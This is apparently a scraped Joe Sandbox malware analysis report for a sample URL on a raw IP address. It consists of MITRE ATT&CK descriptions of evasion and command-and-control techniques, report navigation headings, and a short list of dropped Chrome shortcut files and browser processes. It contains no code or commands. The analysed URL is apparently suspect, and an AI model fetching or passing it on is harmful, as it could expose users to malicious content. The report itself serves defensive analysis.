Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://92.255.57.155/1/1.png

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 1088, Parent PID: 1868

General

Chronological Activities

Analysis Process: chrome.exePID: 6448, Parent PID: 1088

General

Chronological Activities

Windows Analysis Report
http://92.255.57.155/1/1.png